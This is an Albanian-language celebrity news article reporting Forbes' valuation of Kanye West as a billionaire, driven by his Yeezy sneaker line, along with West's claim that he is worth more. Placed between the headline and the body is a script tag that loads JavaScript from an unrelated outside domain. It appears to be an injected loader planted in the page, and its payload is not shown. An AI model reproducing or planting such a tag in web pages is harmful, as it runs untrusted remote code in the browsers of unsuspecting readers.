Header

Forbes: Kanye West zyrtarisht miliarder

<script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script>

Kanye West është zyrtarisht një miliarder pasi linja e tij e atlete u përshkrua si një nga tregimet e shkëlqyera të shitjes me pakicë të shekullit, sipas revistës Forbes.

Reperi dhe stilisti, i cili ka lakmuar prej kohësh statusin, thuhet se ka një vlerë neto të vlerësuar në 1.3 miliard dollarë (1.05bn £).

Pavarësisht se tani ishte klasifikuar zyrtarisht si miliarder, West ishte i pakënaqur me Forbes dhe pretendoi se ata e kishin nënvlerësuar atë.

Reperi raportohet se i dërgoi një tekst një prej punonjësve të tyre duke i thënë: “Nuk është një milliard”.

“Është 3.3 miliard pasi askush në Forbes nuk di të llogarisë.”

Forbes e ka vlerësuar linjën e tij të atleteve Yeezy me 1.26 miliard dollar.

Revista raporton se marka është duke sfiduar Air Jordan Nike për epërsinë e atleteve në botë dhe është një nga tregimet e shkëlqyera të shitjes me pakicë të shekulli.

You may also like ...